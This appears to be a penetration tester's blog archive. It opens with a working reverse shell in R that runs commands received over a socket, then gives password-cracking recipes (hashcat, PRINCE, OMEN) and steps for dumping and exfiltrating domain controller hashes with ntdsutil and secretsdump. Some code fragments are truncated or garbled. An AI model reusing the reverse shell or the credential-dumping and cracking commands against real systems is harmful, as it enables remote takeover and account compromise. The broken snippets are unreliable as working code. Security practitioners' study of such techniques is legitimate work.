Saturday, July 13, 2019

Reverse Shell in 'R'

By underwhelming popular demand, here's a reverse shell for the 'R' language. Change IP address, port and also "cmd /c" if you're not running on Windows.

I may have stolen this off someone, but I can't find it now; many apologies if so.

See also

client <- function(){
    con <- socketConnection(host="", port = 1234, blocking=TRUE, server=FALSE, open="r+")
    while (TRUE){
      sendme <- readLines(con, n=1)
      output <- system(paste0("cmd /c ",sendme), TRUE)
      write_resp <- writeLines(output, con)

Saturday, September 15, 2018

More on password cracking

Some more ideas for password cracking when you've run dict+rules.

lastN or lastN-M is a list of common suffixes taken from a breach compilation

l33tXXX.rule are leetified rules - see perl script after the bash script:


# no inc as we've done it already
python3 -i ../32hex.txt -t md5 --noinc -d /root/dict/Top32Million-probable.txt -r rules/nsav2dive.rule

python3 -i ../32hex.txt -t md5 --noinc -d /root/dict/Top95Thousand-probable.txt -r rules/l33test.rule

# troy hunt and other breaches..
python3 -i ../32hex.txt -t md5 --noinc -d /root/dict/breachcompilation.txt -r rules/nsav2dive.rule

# dumb stuff
# python3 -i ../32hex.txt -t md5 --noinc --mask maskfiles/default.hcmask

python3 -i ../32hex.txt -t md5 -d nb --noinc -e /root/dict/last1-4.txt

python3 -i ../32hex.txt -t md5 --noinc -d /root/dict/ucth.txt -r rules/nsav2dive.rule

python3 -i ../32hex.txt -t md5 --noinc -d /root/dict/Top2Billion_probable.txt -r rules/l33t64.rule

python3 -i ../32hex.txt -t md5 -d /root/dict/first1-4.txt -e nb

# suffixes...
python3 -i ../32hex.txt -t md5 --noinc -d /root/dict/Top95Thousand-probable.txt -e /root/dict/last1-4.txt

# python3 -i ../32hex.txt -t md5 --noinc -d /root/dict/Top32Million-probable.txt -e /root/dict/last3.txt

# python3 -i ../32hex.txt -t md5 --noinc -d /root/dict/Top32Million-probable.txt -e /root/dict/last4.txt

# previously found and phrases
python3 -i ../32hex.txt -t md5 -d nb --noinc -r rules/l33test.rule

python3 -i ../32hex.txt -t md5 --noinc --mask maskfiles/hashcat.hcmask

python3 -i ../32hex.txt -t md5 -d /root/dict/Top2Billion_probable.txt -r rules/best64.rule  --noinc

python3 -i ../32hex.txt -t md5 -d /root/dict/Top2Billion_probable.txt -r hashcat-4.0.1/rules/InsidePro-PasswordsPro.rule  --noinc

python3 -i ../32hex.txt -t md5 -d /root/dict/crackstation.txt --noinc

python3 -i ../32hex.txt -t md5 --noinc -d /root/dict/Top258Million-probable.txt -e /root/dict/last3.txt

# PACK - password policy mask
# python3 -i ../32hex.txt -t md5 --noinc --mask maskfiles/ntlm.hcmask

python3 -i ../32hex.txt -t md5 -d /root/dict/Top2Billion_probable.txt -r rules/nsav2dive.rule  --noinc, which takes an existing rules file and leetifies it:


# leetifies existing rules


while ($line=<STDIN>) {
    chomp($line);    chomp($line);

    if ($line=~m/\S/ && $line!~m/^#/) { 
        if ($line!~m/s[oOaAeEiIsS]/) {
            # don't do repeat substitutions
            print $a;

#usage - might need to dos2unix the source rules first 

# perl rules/ < rules/nsav2dive.rule | awk '!x[$0]++' > l33tnsa.rule

# perl rules/ < d3adhob0.rule.txt | awk '!x[$0]++' > deadleethobo.rule

# perl rules/ < rules/InsidePro-PasswordsPro.rule | awk '!x[$0]++' > l33tpasspro.rule

# cat rules/nsav2dive.rule d3adhob0.rule.txt |  perl rules/ | awk '!x[$0]++' > l33test.rule

# perl rules/ < rules/best64.rule | awk '!x[$0]++' > l33t64.rule

# etc. 

Monday, August 27, 2018

Further password cracking - beyond dict + rules

This works quite well for me when I've exhausted the usual approaches.

Update; the OMEN runs have been finding most passwords - you have the slightly thorny problem of training it on "representative" data, but that is another blog post.


You'll need aspell and its dictionaries installed too. (apt install aspell-* on debian)


Get prince:

Working out rules and dict from passwords

Here, the existing passwords we've cracked from the dump is /root/n3. Use hashcat --show | cut -f 2 -d':' > /root/n3 to get the raw passwords. -b n3 /root/n3

[ this generates n3.rule, n3.word ]

PRINCE - combinations of words

princeprocessor-0.22/pp64.exe < n3.word -l 100000 --pw-min=12 | head -100000 > n3.prince

[generates candidate passwords of length >= 12 by combining existing words ]

hashcat64.exe -a0 -m 1000 n1 n3.prince -r n3.rule  --loopback  -O

OMEN - probabilistic generation

OMEN/createNG.exe --iPwdList=n3.word

[train our model on n3.word]

OMEN/enumNG.exe -m 100000 -p > n3.omen

[generate a list of candidate passwords]

hashcat64.exe -a0 -m 1000 n1 n3.omen -r n3.rule  --loopback  -O

Wednesday, July 25, 2018

New Password Cracking Tool 'hashcrack'

Low key launch as I'm not sure I have squashed all the bugs at this point - I imagine other people will have different use cases than me, and some other ones will come to light.


This will download 30Gb of dictionaries btw; if you don't want to do this, configure your own in the hashcrack.cfg file and remove the step from

git clone
cd hashcrack
python3 hashcrack -i targethashes.txt

The hashcrack program tries to pick some sensible defaults for you and runs hashcat against your wordlist, but if it's not getting anything for you, try the following:

Try phrases, dictionary words and previously found words. The latter will get them fromm your pot file - useful for trying found passwords against different hash types:

$ python3 -i sha512hashes.txt --phrases --words --found

Try existing dictionaries with common suffixes:

$ python3 -i sha512hashes.txt -d dict\Top95Thousand-probable.txt -e dict\last3.txt
$ python3 -i sha512hashes.txt -d dict\Top95Thousand-probable.txt -e dict\last4.txt

If you spot patterns, try and use them, e.g. digits followed by something more complex:

$ python3 -i sha512hashes.txt -d dict\last3.txt --lmask ?d?d?d?d?d?d

or something complex followed by digits:

$ python3 -i sha512hashes.txt -d dict\Top95Thousand-probable.txt --rmask ?d?d?d?d?d?d

or use a crib file of found passwords or guesses - keep it short though. This will generate variants of crib in one pass (leet2 rules) and then use the resulting file to attack using more rules.

$ cat crib.txt

$ python3 -i sha512hashes.txt --crib dict/crib.txt

PRINCE preprocessor

If you're still not getting anything sensible, try hashcat's PRINCE preprocessor. This does some statistical magic with generating new combinations of words from a given wordlist, and maybe worth a go:

Get it here:

$ ./princeprocessor/pp64.bin /root/dict/Top95Thousand-probable.txt --pw-min=9 --case-permute -l 1000000000 > /root/dict/prince.txt

$ python3 -i ../128hex -d /root/dict/prince.txt

Sunday, June 17, 2018

Salts in Passwords

This one is inspired by a comment I read on twitter; essentially someone said that you should use a salt in your password hashes, which is obviously true. However it could have been fleshed out a little bit more than the 280 character limit allows.

Let's take a look at what a salt is:

$ openssl passwd -1 password

I've bolded the salt here - using md5crypt because the actual hash doesn't matter too much and this at least fits on one screen. These days, sha512crypt, bcrypt or something even better is to be preferred.

Above we have hash type, salt and the actual hash, separated by "$" characters. So, why do we have the salt? 

Essentially, if I can get hold of your password hashes and there's no salt, I can try every single password guess against the whole list of users at once - it's just as fast to crack 1,000 passwords as one password.  It also makes it computationally infeasible to build a mapping from password to hash, as we can make the size of the map completely silly.

So - your salt should be cryptographically random and long enough (8 base64 chars here I think, so 48 bits worth).  This means when I'm cracking, I have to perform a computation per individual hash, and not one for the whole lot like I can with plain SHA1 or NTLM. 

Monday, May 28, 2018

Cracking domain password hashes

I don't do a lot of red-teaming, but when I do, I try to tread lightly. This is for two reasons; I'm lazy, I don't like getting phoned up by irate admins if a DC goes down.

I tend to use ntdsutil to dump hashes as soon as I get domain admin, as described here: 

This is a Microsoft tool and I've never had it break a DC, where as I have seen some of the other methods take down a domain controller.

At this point, you have a zip file and exfiltrate the data to your laptop.

Using impacket's secretsdump tool, you can then extract the users:

python impacket/examples/ -system Temp\SYSTEM  -ntds Temp\ntds.dit LOCAL -outputfile ifm.ntds

Use -user-status if you want to only show active accounts, and then grep for these.

Grab the allcase.rule file from here:

You may be lucky and find that some of the LM hashes are present, which makes your job that much easier.

Crack the LM hashes first with the following - to try all 7 letter combinations.

hashcat64.exe -m 3000 ifm.ntds -a3 ?a?a?a?a?a?a?a

Then take the output you've got from this and feed it into your NTLM crack as a crib, because we know the NTLM password will be the same but with different case.

hashcat64.exe -m 1000 -a0 ifm.ntds lmoutput.txt -r allcase.rule

Now, you can go ahead and do the normal cracking - grab dictionaries here if you want:


hashcat64.exe -m 1000 -a0 ifm.ntds Top258Million.txt -r nsav2dive.rule

Of course, you might want to tweak this depending on the password policy.